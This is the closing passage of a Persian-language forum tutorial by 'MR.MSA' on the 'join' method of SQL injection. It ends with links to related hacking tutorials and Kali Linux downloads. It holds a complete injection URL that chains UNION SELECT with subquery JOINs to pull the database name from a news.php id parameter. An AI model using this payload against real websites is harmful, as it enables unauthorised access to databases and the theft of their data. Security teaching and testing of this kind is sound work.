متد join از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+database())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و متد join رو به خوبی یاد گرفته باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
-
- 8
-
-
- bug
- web hacking
- (و 27 مورد دیگر)
